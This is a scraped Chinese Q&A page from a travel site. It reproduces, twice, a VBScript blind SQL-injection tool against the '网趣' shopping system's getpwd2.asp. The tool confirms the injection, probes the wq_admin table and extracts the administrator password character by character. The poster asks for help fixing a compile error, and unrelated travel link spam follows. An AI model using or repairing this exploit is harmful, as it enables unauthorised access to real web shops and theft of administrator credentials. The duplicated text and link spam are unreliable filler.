www.tr4c3.com"
WScript.Quit
Else
strUrl = "http://"&objArgs(0)&"/getpwd2.asp"
strFalse="注册" '特征字符
End If

'检查是否存在注入
If xPosts("username='+or+1=1+and+''='")=True And xPosts("username='+or+1=2+and+''='")=False Then
WScript.Echo "存在注入..."
Else
WScript.Echo "不存在注入..."
WScript.Quit
End if

'检查表
If xPosts("username='+or+0<>(select+count(*)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在wq_admin表..."
Else
WScript.Echo "不存在wq_admin表,退出!请手工校验。"
WScript.Quit
End if

'检查字段
If xPosts("username='+or+0<>(select+count(admin)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在字段admin..."
Else
WScript.Echo "不存在字段admin,退出!请手工校验。"
WScript.Quit
End If
If xPosts("username='+or+0<>(select+count(password)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在字段password,开始猜解密码..."
Else
WScript.Echo "不存在字段password,退出!请手工校验。"
WScript.Quit
End if

'猜测密码
pass = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For j = 1 To 16 Step 1
For k = 1 to len(strings) step 1
IfxPosts("username='+or+(select+left(password,"&j&")+from+wq_admin+where+adminid=1)='"&pass&mid(strings,k,1)&"'+and+''='")=TrueThen
pass = pass & mid(strings,k,1)
exit For
End If
Next
Next

If error Then
WScript.Echo "error:" & Error.Description
Error.Clear
Else
WScript.Echo "Password=" & pass
Wscript.Quit
End If

'---------------------------------------------------------------------------------------
'Code by NP
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
'-----------------------------------------------------------------------------------------
Function xPosts(strSql)
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.open "POST",strUrl,False
xPost.setRequestHeader "Content-Type","Application/x-www-form-urlencoded"
xPost.send strSql
data=bytes2BSTR(xPost.responseBody)
If InStr(data,strFalse)=0 Then
xPosts=True
Else
xPosts=False
End if
End function
---------------------------------------------------------
上为网上公布的网趣注射漏洞的利用程序

但在cmd运行下出现
getpass.vbs(53, 1) Microsoft VBScript 编译器错误: 缺少语句

哪位高人看看语句缺少些什么???"/>
上海旅游网 > 旅游问答 > 内容

网趣注入漏洞··期待高人解决··

发布时间:2024-05-15 00:56 发布:上海旅游网

问题描述:

'Code by Tr4c3@126.com
On Error Resume Next
Dim strUrl,strRight
Set objArgs = WScript.Arguments
If objArgs.Count<>1 Then
WScript.Echo "网趣购物系统XP V3.2版 注入工具 By Tr4c3[at]126[dot]CoM"
WScript.Echo "用于默认配置的猜解,默认管理员admin,adminid=1"
WScript.Echo "Usage:Cscript getpass.vbs www.tr4c3.com"
WScript.Quit
Else
strUrl = "http://"&objArgs(0)&"/getpwd2.asp"
strFalse="注册" '特征字符
End If

'检查是否存在注入
If xPosts("username='+or+1=1+and+''='")=True And xPosts("username='+or+1=2+and+''='")=False Then
WScript.Echo "存在注入..."
Else
WScript.Echo "不存在注入..."
WScript.Quit
End if

'检查表
If xPosts("username='+or+0<>(select+count(*)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在wq_admin表..."
Else
WScript.Echo "不存在wq_admin表,退出!请手工校验。"
WScript.Quit
End if

'检查字段
If xPosts("username='+or+0<>(select+count(admin)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在字段admin..."
Else
WScript.Echo "不存在字段admin,退出!请手工校验。"
WScript.Quit
End If
If xPosts("username='+or+0<>(select+count(password)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在字段password,开始猜解密码..."
Else
WScript.Echo "不存在字段password,退出!请手工校验。"
WScript.Quit
End if

'猜测密码
pass = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For j = 1 To 16 Step 1
For k = 1 to len(strings) step 1
IfxPosts("username='+or+(select+left(password,"&j&")+from+wq_admin+where+adminid=1)='"&pass&mid(strings,k,1)&"'+and+''='")=TrueThen
pass = pass & mid(strings,k,1)
exit For
End If
Next
Next

If error Then
WScript.Echo "error:" & Error.Description
Error.Clear
Else
WScript.Echo "Password=" & pass
Wscript.Quit
End If

'---------------------------------------------------------------------------------------
'Code by NP
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
'-----------------------------------------------------------------------------------------
Function xPosts(strSql)
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.open "POST",strUrl,False
xPost.setRequestHeader "Content-Type","Application/x-www-form-urlencoded"
xPost.send strSql
data=bytes2BSTR(xPost.responseBody)
If InStr(data,strFalse)=0 Then
xPosts=True
Else
xPosts=False
End if
End function
---------------------------------------------------------
上为网上公布的网趣注射漏洞的利用程序

但在cmd运行下出现
getpass.vbs(53, 1) Microsoft VBScript 编译器错误: 缺少语句

哪位高人看看语句缺少些什么???

问题解答:

我觉得你吧,现在去个网吧,找个网管看看,他们应该懂的吧

有趣,共同期待

相关旅游景点
热点新闻
淮安出游桃渚镇旅游注意事项_四月去桃花岛旅游游玩推荐_四
宝鸡出游散客拼团旅游团队从海之韵公园到大连薰衣草庄园地图
邵阳出游孟加拉国旅游_加拿大旅游资讯_加拿大旅游景点介绍
邯郸出游昆仑山旅游攻略_昆仑山旅游景点介绍
辽源出游淮阴旅游攻略1景福宫
岳阳出游旅游门诊所革命的发源地之一
定西出游盘鳌乡旅游可以欣赏美丽的自然风光在此小编为大家介
德州出游斯里兰卡旅游攻略_拉脱维亚斯坦布尔有什么好玩的
莱芜出游阿勒泰旅游必备物品_十一月去乌鲁木齐旅游注意事项
呼和浩特出游旅游网络营销的旅游产品有很多的旅行社都是非常
玉溪出游旅游投资规划同时还将为游客提供一些合理的旅游投资
益阳出游堪培拉旅游费用上海去三清山朱家山自驾游路线_行程
肇庆出游旅游达人微博物馆博物馆艺术馆
晋城出游鲁山旅游_平山市到东京旅游价格_平山市到东京旅游
衡阳出游连云港旅游攻略中秋节巴音郭楞哪里好玩游客人多吗
荆州出游普吉岛旅游安全么十一月去龙潭大峡谷旅游必备物品_
金昌出游水上飞机旅游等等大部分人都选择从北京坐车前来这个
运城出游赫尔辛基旅游要多少钱俄罗斯+西欧+峡湾14日游俄
衡阳出游岩手县旅游要多少钱_8月份去神仙架哪里旅游好_8
黄金岛JJ哪个好
上海索库有哪些职位
移动号段有哪些?移动号段中哪些是G网哪些是C网?联通号段
谁知道你们有个餐饮美食点评拿餐劵的活动
求最近上海781公交一首英文歌
LGKH8000上海行货什么时候上市?
齐齐哈尔柳家朝鲜酒店有限公司是哪年成立的
我要从哈尔滨去武汉哪里可以买到便宜的机票啊
《高分》福州鼓山附近有旅馆吗?打算过去看日出,旅馆要比较
LGKH8000,上海行货什么时候上市?
未成年人可不可以办理网银?
淘宝网店的店标需要链接网址,我在photoshop制作好
请问一下这个网的合法性